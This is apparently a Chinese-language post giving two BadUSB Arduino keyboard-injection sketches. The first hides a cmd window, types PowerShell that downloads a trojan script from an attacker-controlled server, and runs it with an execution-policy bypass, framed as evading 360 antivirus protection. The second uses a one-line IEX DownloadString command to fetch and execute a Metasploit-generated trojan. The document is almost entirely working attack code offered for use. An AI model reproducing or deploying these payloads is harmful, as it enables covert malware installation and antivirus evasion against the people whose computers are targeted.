badusb示例代码可绕过360

绕过360版本代码：

void setup() {
  // putpower shell your setup code here, to run once
  Keyboard.begin();//开始键盘通讯 
delay(3000);//延时 
Keyboard.press(KEY_LEFT_GUI);//win键 
delay(500);
Keyboard.press('r');//r键
delay(500); 
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r'); 
Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1\"");   //使用最小化隐藏cmd窗口
//cmd /c start /minCMD /C START /MIN POWERSHELL -W HIDDEN
delay(500);
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN); 
delay(2000);
Keyboard.println("powershell");
Keyboard.println("$clnt = new-object System.Net.WebClient;");
Keyboard.println("$url= 'http://xxx/mmm.ps1';");  //xxx为你服务器ip，mmm为生成的木马文件
Keyboard.println("$file = ' D:\\mmm.ps1';");      //下载到目标存放文件的地址
Keyboard.println("$clnt.DownloadFile($url,$file)");  //才用分段执行绕过防火墙进程防护
Keyboard.println("PowerShell.exe -ExecutionPolicy Bypass -File d:\\mmm.ps1"); //本地权限绕过执行木马脚本
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK); 
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯 
}

void loop() {
  // put your main code here, to run repeatedly:

}

简单使用版本代码：（360进程防护会阻拦）

Keyboard.begin();//开始键盘通讯 
delay(5000);//延时 
Keyboard.press(KEY_LEFT_GUI);//win键 
delay(500);
Keyboard.press('r');//r键
delay(500); 
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r'); 
Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CMD");
delay(500);
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN); 
delay(2000);
Keyboard.println("powershell -windowstyle hidden -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://xxx/mmm.ps1');mmm.ps1");  //xxx为你服务器ip，mmm为msf生成的木马文件，此代码采用iex执行，不在本机执行。
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK); 
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯